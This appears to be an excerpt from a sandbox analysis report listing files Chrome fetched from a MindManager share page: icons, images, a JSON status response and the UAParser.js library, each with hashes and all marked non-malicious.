                                                                SHA1:92158E99771DE4FBD2219436435DB83F76873C11
                                                                SHA-256:7DC8746A66580C0629211A580A4E447F54EAD7D82C1C12A2F94912A13E5567A1
                                                                SHA-512:B277D5E92C80C6BEF10B52C60A3A9E18FCB57431994A901FEA082E6C4A693FD2D040B784C2DDF63F38C1772D3E6F7E5B760BEF3641ACC4CAA1ED2B275B2351B2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/chevron.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16.01 12"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="7.8 6 1.13 0.5 8.47 0.52 15.22 6 8.47 11.48 1.13 11.5 7.8 6"/><path class="cls-2" d="M2.53,1,8.3,1l6.13,5L8.3,11,2.53,11,7.65,6.77,8.59,6l-.94-.77L2.53,1M0,0V.22L7,6,0,11.78V12l8.65,0L16,6,8.65,0,0,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 16 x 14, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):3246
                                                                Entropy (8bit):7.923894152608521
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2577EE6FD9A98418F4DF758EDFC13FE2
                                                                SHA1:CED4B55AE9B563CC8DF9B8095EC9DF5BCBC7DAA9
                                                                SHA-256:FCE80F811DC3E324F46E2E9FE9F46C90DECAA91CBC6823C40F9FAF1330F60F00
                                                                SHA-512:2F3C177D2D5CDBF152DC5A4DEA21567BE409CCF78EA2CC3DD19BDA9C51E6C16DCBCFF41005B9555A02500A29A41010D2873BEB933E8FB83CD55573375D0AD707
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-add-hyperlink.png
                                                                Preview:.PNG........IHDR.............&/......iCCPICC Profile..H....PS...{.CB.D@J.w.^C.^m.$.PBHA..+.......+M.......E@...,..X...w.Gx...y....r..s.|g... .0..4X..t.H...I.....~.....0.z..........>.G...k:S.......B&.P(.,!3..3.w1......$..Z......H....a..w.p...1.....'..$.C....F.,&..C.A......D...`!\..Izz...!l../u8.V3QR...Hxn.Y.{s..4....8.......C.qR..?...C.&5#P..!..e...r..?j..B..yf1...Y...1....\.=r.....l.O..>..$.!m......y.N....,n..y..F...xI..q...$..d.t.BoL.B...H...b%=...>.8/J...yJj..B%..4?I\..!yV.\.yNa...........@.x...@..A.H."@......|c..z..kD3Cxe.....d...."6..c...,,m......=uv. .Xf...yH...ch.p......1.w.u....n.X.5........P..@.h#;o....p.......d.8..0.y.IV..`....`7....ap.....h...ep.....<..`.....#.. ...!...i@..1d.9@......CqP..x..Z.m.."....j._.s.e.&..=...Q....F.$X.V..`s......Hx..3.l8.....U.q.........5<..()....2E9..P!.xT.J...C...P..VT...j.5....)h.....GG...L.Ft...].nB_E.E.....1d.*...cb1..jL...s.s.s....|.b.T.>....`.a......6l.v.;...q.8.\.....rq.p.q.p..a.'..^.o.....y....|.."...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 70 x 50, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):431
                                                                Entropy (8bit):7.183354611469627
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2877ED6D1B69E03FD8D7AE584527E7AA
                                                                SHA1:CFA64591A2B9565BA5BD2DC62E79525F53D56B4A
                                                                SHA-256:45091431ADE7448B7B0578D57688C3CB7BA12744C527D7C9729215692455AD1E
                                                                SHA-512:E271EABA4A4C569167AE2636F739302D6608F47B599E92D9A22A73E77CFC12C6892CE838A9C531CAD3D6676533FB473FA74BE11034C3D8B0D9B3C4A6FC2EE7C0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-add-image-selected.png
                                                                Preview:.PNG........IHDR...F...2......S....bKGD.......C......pHYs.........B(.x....tIME.......*H5....<IDATh.....@..w..h..!.g.6...E....O6s.-..d`..B.P.N.{A..z2......zN.......1...).v......H..<V....`.L..0-?.4....1^]#%:.k:z..O...(b.Z'....-2..<x.b.W..)'..:fi|.v.<@..#^.t5J%.%K8%.c...#.4...U.U[.....N5....r......].U.l..5|I2...B..1... .fP...........I.G.1o9.q[..n..=@...^..e..C......`xI..VXy.@.#.&k....p.7.P(.....6.b.<?.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):869
                                                                Entropy (8bit):4.8475694130270215
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2DBABF6F12C35707B3BE534A1EB308F0
                                                                SHA1:10AF36F8945892BAE353037736C888D34CD8C08A
                                                                SHA-256:7926EC8AC6D2ED3301769D9EF983D353A17D891F6A019EB9BBF06AB224237914
                                                                SHA-512:30614AFDE0917A77FB7AFA954CFE08F76CB5070F263CA5CCDD43CA29ECE0F32F80D9B6D9E79C5CEB720B6C68EC03604C7203100A5F6A04CF43E6ABB0B86B113F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/magnifying-glass.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#999;}.cls-2{fill:gray;}.cls-3{fill:#666;}</style></defs><title>magnifying_glass_16</title><path class="cls-1" d="M6,0a6,6,0,1,0,6,6A6,6,0,0,0,6,0ZM6,11a5,5,0,1,1,5-5A5,5,0,0,1,6,11Z"/><rect class="cls-2" x="13" y="13" width="1" height="1"/><rect class="cls-3" x="14" y="14" width="2" height="2"/><rect class="cls-3" x="14" y="14" width="2" height="2"/><rect class="cls-3" x="13" y="13" width="2" height="2"/><rect class="cls-3" x="13" y="13" width="2" height="2"/><rect class="cls-2" x="12" y="12" width="1" height="1"/><rect class="cls-2" x="12" y="12" width="1" height="1"/><rect class="cls-2" x="11" y="11" width="1" height="1"/><rect class="cls-2" x="11" y="11" width="1" height="1"/><rect class="cls-2" x="10" y="10" width="1" height="1"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:downloaded
                                                                Size (bytes):443
                                                                Entropy (8bit):5.071337030993538
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DB6CDE2920011C93B9EDABE8BAFAE29E
                                                                SHA1:040ABF1B32012DB7C4DE8F14868B205FE8D37A9F
                                                                SHA-256:D73A4ED43F479997A54B587D76C81BBAEB3FCDF6013F38E8C064EE6AA783F3BD
                                                                SHA-512:288FE16C2792DD06BBA7F2FC3599F678EC0E908BBEB78630E85496FAD0CA5CD029AE7DB98AF8D05F0E56989DC2EA3FF0A438230C493DDFE6E1647814533ACC2C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://cloud.mindmanager.com/api/v1/publish/file/status?publishId=mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6&viewsCount=true&includeLogo=true&_=1720116264234
                                                                Preview:{"region":"us","status":"published","upload_status":"published","options":"{\"topicClickOpensLink\":null,\"mapFitContent\":null,\"mode\":\"published\",\"brandingHyperlink\":null,\"downloadable\":null}","name":"Whiteboard 2.mmap","createdAt":"2024-07-03T11:55:58.000Z","updatedAt":"2024-07-03T11:55:58.000Z","viewsCount":677,"publishType":"private","userType":"Trial","url":"https://us.sharing.mindmanager.com/cbiQb7SDgu5zNdFUqzqQ","logo":null}
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1316
                                                                Entropy (8bit):4.376498039172356
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:98457CCB25BA2A5689FBA38EEAF9274F
                                                                SHA1:4D12F7040C2B305FC9BCEA9DEC857138FE70DD88
                                                                SHA-256:0AB04265DF281858A86E67439F4152DB21A4BFE620E93BB09D251A1FD535C0F4
                                                                SHA-512:E37B609282A0BB89BF7450E408779E67ABB420188F93EF9D88180CD4C8D3099D36E26766E75B26A7D223320A6E10662A5255EE478FC829EB8D9D660DB0F4F2D4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/options-sort-recent.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 30 29.25"><defs><style>.cls-1{fill:#3a52a4;}</style></defs><title>sort recent</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M13.29,22a.76.76,0,0,1,0,1.07l-6,6A.59.59,0,0,1,7,29.2a.82.82,0,0,1-.57,0A.59.59,0,0,1,6.23,29l-6-6A.76.76,0,0,1,.22,22a.72.72,0,0,1,.53-.22.72.72,0,0,1,.53.22L6,26.69V.76A.74.74,0,0,1,6.23.22a.74.74,0,0,1,1.05,0A.74.74,0,0,1,7.5.76V26.69L12.22,22a.76.76,0,0,1,1.07,0Zm5.46.53h.17l.17-.06,3-1.49a.72.72,0,0,0,.34-.36.74.74,0,0,0,.05-.49.72.72,0,0,0-.26-.41.74.74,0,0,0-.47-.16A6.51,6.51,0,0,1,19.13,19a6.82,6.82,0,0,1-3.6-3.6,6.7,6.7,0,0,1,0-5.24,6.82,6.82,0,0,1,3.6-3.6,6.7,6.7,0,0,1,5.24,0,6.82,6.82,0,0,1,3.6,3.6,6.51,6.51,0,0,1,.53,2.62.75.75,0,0,0,1.49,0,8,8,0,0,0-.65-3.22,8.4,8.4,0,0,0-1.77-2.62A8.3,8.3,0,0,0,25,5.16a8.31,8.31,0,0,0-6.42,0,8.24,8.24,0,0,0-4.39,4.39,8.33,8.33,0,0,0-.21,5.86,8.26,8.26,0,0,0,1.21,2.29A8.44,8.44,0,0,0,17,19.48a8.14,8.14,0,0,0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 15 x 15, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):3072
                                                                Entropy (8bit):7.917866424037365
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:12BABC2DFD3079D59F80DA46889AACA0
                                                                SHA1:8FDCDBBCAEDC4E0AC34CE0A46B44E2BB107F5020
                                                                SHA-256:FDEA7E2E1CEFD2BA40381125DAC701AA51BE2E469A7AF746940EC66C835C21A0
                                                                SHA-512:D90201424A562C87BF57008708FE8AAA0B724E82A423397BD98F2CE1471F2FD80637642324D38925E03D3FF600EA32C09D82F6549113CB5AD76FD87D59BE672A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-add-child.png
                                                                Preview:.PNG........IHDR.............;.J....iCCPICC Profile..H....PS...{.CB.D@J.w.^C.^m.$.PBHA..+.......+M.......E@...,..X...w.Gx...y....r..s.|g... .0..4X..t.H...I.....~.....0.z..........>.G...k:S.......B&.P(.,!3..3.w1......$..Z......H....a..w.p...1.....'..$.C....F.,&..C.A......D...`!\..Izz...!l../u8.V3QR...Hxn.Y.{s..4....8.......C.qR..?...C.&5#P..!..e...r..?j..B..yf1...Y...1....\.=r.....l.O..>..$.!m......y.N....,n..y..F...xI..q...$..d.t.BoL.B...H...b%=...>.8/J...yJj..B%..4?I\..!yV.\.yNa...........@.x...@..A.H."@......|c..z..kD3Cxe.....d...."6..c...,,m......=uv. .Xf...yH...ch.p......1.w.u....n.X.5........P..@.h#;o....p.......d.8..0.y.IV..`....`7....ap.....h...ep.....<..`.....#.. ...!...i@..1d.9@......CqP..x..Z.m.."....j._.s.e.&..=...Q....F.$X.V..`s......Hx..3.l8.....U.q.........5<..()....2E9..P!.xT.J...C...P..VT...j.5....)h.....GG...L.Ft...].nB_E.E.....1d.*...cb1..jL...s.s.s....|.b.T.>....`.a......6l.v.;...q.8.\.....rq.p.q.p..a.'..^.o.....y....|.."...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 25 x 8, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):3.9574232700791026
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C3178D9495699F5E1EFD08F4870DC7AD
                                                                SHA1:6B37A3FAE15C379C4CFAB04679F0F6687BE0AF63
                                                                SHA-256:61D9D7C94CDC69EC2A4C5C150A28BEFEFCBD1747875760B19DFA8FC7342CF16A
                                                                SHA-512:08ED5F7EAD1A96487D66CEEE4C990EB8E44D5B2CA5645E297CB87276E1DA89961C3EA8707CD56E09BB288C53640D9FBC0B964F18C592301D3AEA4041B85FD3B4
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR.....................IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (19601), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):19705
                                                                Entropy (8bit):5.796517315110446
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3A95271B2F74F5C326A2DE0F846E30BE
                                                                SHA1:7964EA56AB01120E379E5E5E81C188C9120EAF2A
                                                                SHA-256:EE363763E18B96B939AF420772B6F76A1469EEEC182F616FC7E7F927578E2F63
                                                                SHA-512:0EF17D9B9AF967FA063B359F67A56254F9942A785A64D0E51F216824C561A6E1FE15937C0C928C456B12911AECDBDA7A6D500DE992D2711D359261670AE4397D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://ipm.corel.com/static/common/scripts/ua-parser.min.js
                                                                Preview:./* UAParser.js v1.0.2.. Copyright . 2012-2021 Faisal Salman <f@faisalman.com>.. MIT License */..(function(window,undefined){"use strict";var LIBVERSION="1.0.2",EMPTY="",UNKNOWN="?",FUNC_TYPE="function",UNDEF_TYPE="undefined",OBJ_TYPE="object",STR_TYPE="string",MAJOR="major",MODEL="model",NAME="name",TYPE="type",VENDOR="vendor",VERSION="version",ARCHITECTURE="architecture",CONSOLE="console",MOBILE="mobile",TABLET="tablet",SMARTTV="smarttv",WEARABLE="wearable",EMBEDDED="embedded",UA_MAX_LENGTH=255;var AMAZON="Amazon",APPLE="Apple",ASUS="ASUS",BLACKBERRY="BlackBerry",BROWSER="Browser",CHROME="Chrome",EDGE="Edge",FIREFOX="Firefox",GOOGLE="Google",HUAWEI="Huawei",LG="LG",MICROSOFT="Microsoft",MOTOROLA="Motorola",OPERA="Opera",SAMSUNG="Samsung",SONY="Sony",XIAOMI="Xiaomi",ZEBRA="Zebra",FACEBOOK="Facebook";var extend=function(regexes,extensions){var mergedRegexes={};for(var i in regexes){if(extensions[i]&&extensions[i].length%2===0){mergedRegexes[i]=extensions[i].concat(regexes[i])}el
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1234
                                                                Entropy (8bit):4.603576872679445
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F8337C9A6EDD09B1309B2BCE0B4870A1
                                                                SHA1:1D505CCC01239BC7CB8BF9F237DF6D95855D0DBC
                                                                SHA-256:C24A63E1F1A3F90E86320DF3AE7E7E72CA83DD75C309CD7576435AD81C0EA82B
                                                                SHA-512:440EA3B5893246C98149CE7A9907D7209A3158B295625E583B89274C788543A25F46B4E95B1341F9D3F166CB95706F34BE15D00893E2834F5CB311F1C8F1780F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/photo-library.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 41 41"><defs><style>.cls-1{fill:#fff;stroke:#3a52a0;stroke-miterlimit:10;}.cls-2{fill:#3a52a0;}</style></defs><title>mobile-capture-buttons-photo</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-2" d="M29.2,10.82a1.5,1.5,0,0,1,1.5,1.5v17a1.44,1.44,0,0,1-.44,1.05,1.46,1.46,0,0,1-1.06.44h-17a1.46,1.46,0,0,1-1.06-.44,1.44,1.44,0,0,1-.44-1.05v-17a1.5,1.5,0,0,1,1.5-1.5Zm.5,18.51v-17a.47.47,0,0,0-.14-.35.52.52,0,0,0-.36-.14h-17a.52.52,0,0,0-.36.14.52.52,0,0,0-.14.35V23l3.45-3.8a1.48,1.48,0,0,1,.48-.35,1.58,1.58,0,0,1,.57-.13,1.39,1.39,0,0,1,.57.12,1.58,1.58,0,0,1,.48.33L27.41,29.82H29.2a.48.48,0,0,0,.36-.14A.47.47,0,0,0,29.7,29.33Zm-18,0a.52.52,0,0,0,.14.35.48.48,0,0,0,.36.14H26l-9.5-9.93a.65.65,0,0,0-.15-.1.51.51,0,0,0-.17,0,.47.47,0,0,0-.17,0l-.14.11-4.2,4.62Zm12.5-9.51A2.46,2.46,0,0,0,26,19.09a2.67,2.67,0,0,0,.53-.79,2.48,2.48,0,0,0,0-1.95,2.55,2.55,0,0,0-.53-.79,2.52,2.52,0,0,0-1.77-.74,
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1592
                                                                Entropy (8bit):5.157349695101127
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:611DA74863C7EE6D36B56DBD64A154A7
                                                                SHA1:834B40FF46ECF1216FFF6D1BD35D6298EB961D09
                                                                SHA-256:F90A63FA2087DCA75B0569B182CAA77C0B58771B55AD4B97098422554D791E29
                                                                SHA-512:A1DA961826B5086AF9A1CE9CF892C605BA890D682475712E2B451C514646FE7776704C66116F655E1DD6DD2B5602FC8B36DF436119EC4427DE4B61AFF4A42FB9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_print.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#c8c7c8;}.cls-2{fill:gray;}.cls-3{fill:#fff;}.cls-4{fill:#4f87c6;}.cls-5{fill:#af833b;}.cls-6{fill:#92b87c;}.cls-7{fill:#629f59;}.cls-8{fill:#a32122;}</style></defs><title>context_print</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M3,8.5a1.5,1.5,0,0,1,0-3H13a1.5,1.5,0,0,1,0,3Z"/><path class="cls-2" d="M13,6a1,1,0,0,1,0,2H3A1,1,0,0,1,3,6H13m0-1H3A2,2,0,0,0,3,9H13a2,2,0,0,0,0-4Z"/><path class="cls-3" d="M3.5,6.5V2A1.52,1.52,0,0,1,5,.5h6A1.52,1.52,0,0,1,12.5,2V6.5Z"/><path class="cls-2" d="M11,1a1,1,0,0,1,1,1V6H4V2A1,1,0,0,1,5,1h6m0-1H5A2,2,0,0,0,3,2V7H13V2a2,2,0,0,0-2-2Z"/><path class="cls-4" d="M9.16,3a.85.85,0,0,1,.84.84V6H6V3.84A.85.85,0,0,1,6.84,3H9.16m0-1H6.84A1.85,1.85,0,0,0,5,3.84V7h6V3.84A1.85,1.85,0,0,0,9.16,2Z"/><rect class="cls-5" x="9" y="3" width="1" height="1" rx="0.37"/><polygon class="cls-6" points="5.91 6.5 6.59 5.32 7.27 6.5 5.9
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):390
                                                                Entropy (8bit):5.1417413132260466
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1F04DFCBA61A9D813306074BBB5B8427
                                                                SHA1:49631B1CE8F5DD19294EFAEB8363514ADC09BF82
                                                                SHA-256:C0F0FED288146FE85183C328AD63FE8F7355260A928A9F3C8BB24E5FB4361634
                                                                SHA-512:99A5CD6D6A8037CACEB2C5F71F5BAAC59CB488F1659E80AF41F9C567331E42E11AC82F15F5196C5A22D5DE07F715677F31F8787408CEEBB7FC31A20097BE92E0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/block-arrow.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16.01 12"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="0.5 0.5 5.52 0.52 15.01 6 5.52 11.48 0.5 11.5 0.5 0.5"/><path class="cls-2" d="M1,1,5.38,1,14,6,5.38,11,1,11V1M0,0V12l5.65,0L16,6,5.65,0,0,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):835
                                                                Entropy (8bit):5.158792284381543
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:50D55181CF64B664CC47213DB06800D0
                                                                SHA1:47D4CBD1F227B51CDBF1E970C66ECEBDA44B9115
                                                                SHA-256:DB352E9B723C2F9F73CCBC88D95C1E272005458372FABDA98BE476E3BF65A047
                                                                SHA-512:3B9380AF442BD807C505F8B67CD32DDDC12B0288D802F421C7E90AF836A716895A71204014802CBCD50C71DAD48FE2B0994357BBA4F542004F55C014002E5BDC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/roPercentageDone08.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}.cls-5{fill:gray;}</style></defs><title>roPercentageDone08</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8,15.5A7.49,7.49,0,0,1,2.59,2.82L8.5,8.73V.52a7.5,7.5,0,0,1-.5,15Z"/><path class="cls-4" d="M9,1.07A7,7,0,1,1,2.61,3.54L7.29,8.23,9,9.94V1.07M8,0V7.52L2.59,2.11A8,8,0,1,0,8,0Z"/><path class="cls-5" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-1" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1,1-1H3M2,13H3V11H2v2M3,9H2a2,2,0,0,0-2,2v1H-1v5H6V12H5V11A2,2,0,0,0,3,9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):333
                                                                Entropy (8bit):5.139257724709232
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3F590FBF754EB1A62A66EAF6833CBCA5
                                                                SHA1:88C631EC4EDD79E036BF33A3DB37234088BDEAE0
                                                                SHA-256:4551A94B572041E51510791853E0BF4FE650F292125A8BBE8E6BE4B9D0048596
                                                                SHA-512:0243EEB51C008C6CAFBD48DA8A2CDFE8F2B76AA5D602F6DB9F3800DFA1B15B5C079B1C90A70F408496AC78DA3577B9F014CA5E24F35423D6F47AB897271F15B9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/percentageDone01.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}</style></defs><title>percentageDone01</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2394
                                                                Entropy (8bit):4.706171352081439
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BE5F44F73BA934A54AA6B65F3E70D49E
                                                                SHA1:3DAF0016E5B3DF37D9764FDDC83C9FD4D51C5AEA
                                                                SHA-256:05D604673CDE0CF778F0F7BFA89E4AB1A80DF244F03241ED1DE6C71940DA3490
                                                                SHA-512:8462DD53046131B0280576A3D561713C2CEFB9BEB74F078449F0FF9C6BA3874AD6A89A6D177A04F5A7C127491DB91933F5A4F25FA070743ADFB5251DEBC6179F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/smiley-angry.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03637;}.cls-2{fill:#333;}.cls-3{fill:#ff5760;}</style></defs><title>emoji_18_16</title><circle class="cls-1" cx="8" cy="8" r="8"/><rect class="cls-2" x="5" y="12" width="1" height="1"/><rect class="cls-2" x="6" y="11" width="4" height="1"/><rect class="cls-2" x="10" y="12" width="1" height="1"/><rect class="cls-3" x="5" y="13" width="1" height="1"/><rect class="cls-3" x="6" y="12" width="4" height="1"/><rect class="cls-3" x="10" y="13" width="1" height="1"/><rect class="cls-3" x="9" y="9" width="1" height="1"/><rect class="cls-3" x="10" y="8" width="1" height="1"/><rect class="cls-3" x="10" y="9" width="1" height="1"/><rect class="cls-3" x="11" y="7" width="1" height="1"/><rect class="cls-3" x="9" y="8" width="1" height="1"/><rect class="cls-3" x="10" y="7" width="1" height="1"/><rect class="cls-3" x="6" y="9" width="1" height="1" transform="translate(13 19) rotate(-1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):434
                                                                Entropy (8bit):5.107523304614574
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F92FD797FC1FAAC8F844B69DB52D3B1E
                                                                SHA1:540DD21255B53D789302922CAAB4D534B24068D3
                                                                SHA-256:DADFC66D68A60DAF8449C7A082C39FA79139F5076F11B89290F45291E9A9B260
                                                                SHA-512:19502F69BB3E738D2B50B0B0DAF9A0998E9357B27B9BCB26719F5A33369DD1483CCEEFB3C04E21E9905D4994A4806C8715C1F940F3E1D1BE27D9DC70930BCCA3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/broken-connection.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03637;}</style></defs><title>x_mark_16</title><rect class="cls-1" x="6.03" y="-2.49" width="3.93" height="20.98" rx="1.9" ry="1.9" transform="translate(-3.32 8) rotate(-45)"/><rect class="cls-1" x="6.03" y="-2.49" width="3.93" height="20.98" rx="1.9" ry="1.9" transform="translate(7.99 19.32) rotate(-135)"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):961
                                                                Entropy (8bit):5.027585150939125
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2106FC6C658188DDC0F3D0DC65064E6B
                                                                SHA1:ABA7FB3057C8FC1414994BEBA7CBF4089F4A5486
                                                                SHA-256:41E2DA4168CF81537EB4786BC63AE9417FB9F26A80CD556D390F722B1B9388FD
                                                                SHA-512:B06A190DBC1E60A107374EB22A53AD1F13D943308E46D4EB5555E2DE24ABBD25C1D49E31F3AF1FB968D908CE72833417F24D54AE30C3BC6F9A50633E77563757
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/icon_feedback.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16.5 15"><defs><style>.cls-1{fill:#cbcacb;}.cls-2{fill:gray;}.cls-3{fill:none;stroke:gray;stroke-miterlimit:10;}.cls-4{fill:#7db0df;}.cls-5{fill:#4f87c6;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><circle class="cls-1" cx="10.5" cy="4.5" r="3"/><path class="cls-2" d="M10.5,2A2.5,2.5,0,1,1,8,4.5,2.5,2.5,0,0,1,10.5,2m0-1A3.5,3.5,0,1,0,14,4.5,3.5,3.5,0,0,0,10.5,1Z"/><path class="cls-3" d="M10.59,7.15c-3,0-5.42,3.29-5.42,7.35H16C16,10.44,13.58,7.15,10.59,7.15Z"/><path class="cls-4" d="M2.76,4.48H2.65A2.22,2.22,0,0,1,.5,2.5,2.3,2.3,0,0,1,3,.5a2.3,2.3,0,0,1,2.5,2A2,2,0,0,1,4.23,4.23l-.52.24.63,1Z"/><path class="cls-5" d="M3,1c1.08,0,2,.69,2,1.5A1.48,1.48,0,0,1,4,3.77l-.84.39-.07,0L2.92,4,2.7,4A1.72,1.72,0,0,1,1,2.5C1,1.69,1.92,1,3,1M3,0A2.78,2.78,0,0,0,0,2.5,2.71,2.71,0,0,0,2.59,5L5.94,7,4.44,4.68A2.47,2.47,0,0,0,6,2.5,2.78,2.78,0,0,0,3,0Z"/></g></g></svg>
